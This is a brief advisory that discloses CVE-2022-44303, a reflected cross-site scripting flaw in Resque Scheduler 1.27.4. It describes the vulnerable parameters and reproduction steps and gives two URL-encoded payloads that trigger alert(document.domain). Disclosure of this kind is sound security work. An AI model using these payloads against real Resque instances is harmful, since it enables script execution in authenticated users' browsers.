# Resque 1.27.4 - Multiple Reflected XSS in Resque Schedule Job

## **CVE-2022-44303**

**Date:** 24/10/2022

**Exploit Author:** TrungVM of VietSunshine Cyber Security Services

**Affected Version(s):** Resque Scheduler version 1.27.4 

**Description:** Resque Scheduler version 1.27.4 is vulnerable to Cross-site scripting (XSS). A remote attacker could inject javascript code to the "**{schedule\_job}**" or "**args**" parameter in */resque/delayed/jobs/{schedule\_job}?args={args\_id}* to execute javascript at client side.

**Steps to reproduce:**  An attacker sends a draft URL *https\://{IP]/resque/delayed/jobs/{schedule\_job}?args={args\_id}* to a victim. When an authenticated victim opens a URL, XSS will be triggered.

**Payload example:**

* **Ex1:** *https\://{IP]/resque/delayed/jobs/%3Csvg%20onload=alert(document.domain)*
* **Ex2:** *https\://{IP/resque/delayed/jobs/EventEmailSalesTeamBefore48hrsJob?args=\[%2249213%3Cimg+src=x+onerror=alert(document.domain)%3E%22]*